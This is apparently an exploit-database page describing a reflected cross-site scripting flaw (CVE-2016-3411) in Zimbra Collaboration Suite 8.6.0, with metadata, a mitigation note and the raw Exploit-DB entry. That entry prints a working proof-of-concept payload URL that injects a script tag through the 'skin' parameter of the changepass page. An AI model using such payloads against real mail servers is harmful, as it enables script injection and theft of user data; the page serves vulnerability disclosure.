header-logo
Suggest Exploit
vendor:
Zimbra Collaboration Suite
by:
Dinbar78
6.1
CVSS
MEDIUM
XSS
79
CWE
Product Name: Zimbra Collaboration Suite
Affected Version From: 8.6.0_GA_1153 (build 20141215151110)
Affected Version To: 8.6.0_GA_1153 (build 20141215151110)
Patch Exists: YES
Related CWE: CVE-2016-3411
CPE: a:zimbra:zimbra_collaboration_suite
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018

Xss Zimbra Mail server

A vulnerability in Zimbra Mail server allows an attacker to inject malicious JavaScript code into the application. This can be done by sending a specially crafted URL to the application. The URL contains a malicious payload which is executed when the user visits the page. The payload can be used to execute arbitrary JavaScript code, which can be used to steal user data or perform other malicious activities.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the application to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: Xss Zimbra Mail server
# Google Dork:
# Date: 2018/08/10
# Exploit Author: Dinbar78
# Vendor Homepage: https://www.zimbra.com/

# Version: 8.6.0_GA_1153 (build 20141215151110)
# bug 103609 or CVE-2016-3411


Payload: es.
https:// (zimbrasite)/h/changepass?skin="><script>alert('hacked');</script>

Navigation

Suggest Exploit

Services By CQR